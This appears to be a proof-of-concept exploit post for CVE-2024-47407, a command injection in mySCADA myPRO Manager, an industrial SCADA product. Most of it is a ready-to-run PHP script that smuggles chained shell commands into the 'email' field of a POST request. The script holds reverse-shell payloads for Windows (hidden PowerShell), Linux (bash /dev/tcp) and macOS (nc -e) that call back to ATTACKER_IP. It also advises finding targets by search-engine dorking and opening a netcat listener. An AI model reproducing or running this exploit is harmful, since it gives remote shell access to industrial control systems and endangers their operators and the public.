=============================================================================================================================================
| # Title     : MySCADA MyPRO Manager 1.2 PHP Code Injection Vulnerability                                                                  |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.myscada.org/mypro/                                                                                              |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:
    
	PHP Code Injection Vulnerability in mySCADA myPRO Manager versions up to v1.2, aka CVE-2024-47407.
	
	Send an HTTP POST request to /get with the email data containing the command to be executed. 
	
	Check if the response is 200, meaning the command was executed successfully.
	
	Before running the code, open a Netcat window on your attacking machine and listen for connections on the specified port: nc -lvnp ATTACKER_PORT
	
	(Related : https://packetstorm.news/files/id/189175/ Related CVE numbers: 	CVE-2024-47407 ) .
	
[+] save code as poc.php .

[+] Set Target : line 4 + 5 + 6

[+] USage : php poc.php 

[+] PayLoad :

<?php
// by indoushka
// استغلال CVE-2024-47407 في mySCADA myPRO Manager للحصول على Shell Reverse على أنظمة تشغيل مختلفة

$target = "http://target-ip:34022/get"; // استبدل بـ IP الضحية
$attacker_ip = "ATTACKER_IP"; // استبدل بـ IP المهاجم
$attacker_port = "ATTACKER_PORT"; // استبدل بالمنفذ الذي ستستمع عليه

// كشف نظام التشغيل وتنفيذ الحمولة المناسبة
$windows_payload = "powershell -NoP -NonI -W Hidden -Exec Bypass -Command \"\$client = New-Object System.Net.Sockets.TCPClient('$attacker_ip',$attacker_port); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()}; \$client.Close()\"";

$linux_payload = "/bin/bash -c 'bash -i >& /dev/tcp/$attacker_ip/$attacker_port 0>&1'";

$mac_payload = "osascript -e 'do shell script \"nc -e /bin/bash $attacker_ip $attacker_port\"'";

// تجهيز البريد الإلكتروني لاستغلال حقن الأوامر
$email_injection = rand(100, 999) . "@" . rand(1000, 9999) . ".com&&";

$email_injection .= "if exist C:\\Windows\\System32\\ cmd /c \"$windows_payload\"";
$email_injection .= "; if [ -f /bin/bash ]; then $linux_payload; fi";
$email_injection .= "; if [ -f /usr/bin/osascript ]; then $mac_payload; fi";
$email_injection .= " #";

// إعداد بيانات الطلب
$data = json_encode([
    "command" => "testEmail",
    "email" => $email_injection
]);

// إرسال الطلب
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// التحقق من نجاح الاستغلال
if ($http_code == 200) {
    echo "[+] تم إرسال حمولة Shell Reverse بنجاح! انتظر الاتصال على المنفذ $attacker_port\n";
} else {
    echo "[-] فشل التنفيذ، ربما النظام محمي.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================